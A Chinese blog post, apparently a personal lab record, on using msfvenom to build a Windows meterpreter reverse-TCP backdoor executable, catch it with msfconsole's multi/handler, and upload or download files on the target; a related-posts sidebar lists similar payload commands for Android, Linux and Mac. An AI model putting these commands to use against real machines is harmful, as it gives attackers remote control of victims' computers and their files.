Msfvenom使用记录

已于 2024-10-28 21:49:57 修改
阅读量348 收藏 8
点赞数 3
文章标签: 学习 网络安全
于 2024-10-28 20:27:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80049865/article/details/143305908
版权

Msfvenom使用记录

Msfvenom是用来生成后门的软件。

 

攻击机:kali

靶机:物理机

使用工具:Msfvenom

 

使用过程:

(1)生成文件

例:(见下图)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe -o /var/payload.exe

说明:

-p指定哪些有效载荷生成,如:windows/meterpreter/reverse_tcp,用于Windows平台的反向远程控制程序

-f指定有效载荷的格式,如:exe,生成Windows系统的可执行文件

-o指定保存位置,如:/var/payload.exe

e8543af8abe74f1eaf8a6b467d82aa64.png

输入msfvenom -h查看帮助选项,这里不一一列举

 

(2)将生成的文件复制到靶机上

 

(3)输入msfvenconsole

d1e9cb772461438aa52a4bda7a2c96f3.png

 

(4)进行配置:

use multi/handler ,选择模块

set payload windows/meterpreter/reverse_tcp ,选择模块

set LHOST 192.168.154.4 ,填写攻击机的IP地址

set LPORT 5000 ,填写生成文件中的端口号

show options ,查看设置参数

exploit ,执行

f493ecf2184d4b218416011d4e43feea.png

运行前打开靶机上的文件,然后再使用exploit

f93e4f685eb44b23866f7fc5655d716f.png

成功

 

(5)可以运行一些指令,这里用的meterpreter,详细的可以自己去查meterpreter的常用指令,

        这里举两个例子:

        将本机上的某文件上传到靶机上的某地址:

        upload [攻击机上的某文件] [靶机上的某地址]

b60d64f439b346c78fcaf4ce297f9870.png

        下载靶机上的某文件到攻击机上:

        download  [靶机上的某文件]

873864b4b4f54ddbb93d46e7e6f3339a.png

28616ab599524e5894c7ef544499ad5f.png

 

(6)可使用安全检测网站检测该木马文件,例如www.virustotal.com

翻译了一下网站

2e7f02425ed24781b6375ca6a494c534.png

结果如下图

6dfd90f39ef34a29a7c3b1cfc4d38c40.png

 

 

_Night_sky_
关注
msf之msfvenom使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4449
msfvenom使用
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 1265
是msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
Kali [Msfvenom生成木马文件]
weixin_45253622的博客
03-15 1万+
Msfvenom生成木马文件 木马大全: 安卓app: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf Mac: msfvenom -p osx/x8
msfvenom 基本使用
blackguest07的博客
03-05 1896
msfvenom 基础命令
MSF生成后门木马
一醉一休的博客
11-19 3465
为了方便平时使用记录一下操作命令
用MSF生成windows系统后门程序
gcsdsh的博客
03-26 703
Metasploit框架提供了一个全面的工具集,包括扫描器、利用工具、Payload生成器等,使安全专业人员能够模拟攻击并评估目标系统的安全性。MSF(全名msfconsole)是Metasploit的一个模块,可以执行扫描、利用漏洞、生成Payload以及执行各种其他操作来评估和测试目标系统的安全性。这样就算成功,接下来只需让靶机运行该后门程序,给kali开启apache,可以让靶机直接下载生成的程序。由于这里的靶机是虚拟机,没有摄像头,就不做演示了,还可以执行很多命令,可以用help查看。
msfvenom使用方法
wutiangui的博客
04-25 203
我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter。
利用msf渗透永恒之蓝,并制作后门
最新发布
weixin_46954909的博客
04-17 492
前期准备:存在永恒之蓝漏洞win7kail主机。
关于Metasploit-学习笔记-基础命令以及参数
weixin_34190136的博客
09-13 1257
Metasploit官网 原文链接:http://www.freebuf.com/tools/67685.html1、官网内容很多,但是都是一些英文。2、有Windows平台的安装,也有Linux平台的。总之就是基于pc的安装。3、在命令行窗口输入msfconsole可以直接进入Metasploit这个工具的工作环境。4、Msfconsole的系统文件和用户文件位于/usr...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 4万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
msf常见命令
longwanlian的博客
10-16 254
4.进入meterpreter模式。开启监听端口,用来连接木马。5.连接上shell后。各操作平台生成木马命令。
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 843
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
MSF后门生成及免杀思想
qq_68233961的博客
11-14 1426
MSF后门生成及免杀思想
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 5771
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。...
使用msfvenom生成木马
Sylon的博客
08-27 3609
msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4899
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3660
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
MSF使用总结
qq_44657899的博客
09-25 4978
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
【MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 2153
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
msfvenom.rb文件
04-04
使用msfvenom.rb,攻击者可以自定义载荷的功能和特性,例如反向Shell、键盘记录器、远程访问工具等,以便在攻击目标时实现所需的攻击目标。在生成载荷时,攻击者可以指定使用的操作系统、体系结构和目标应用程序,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值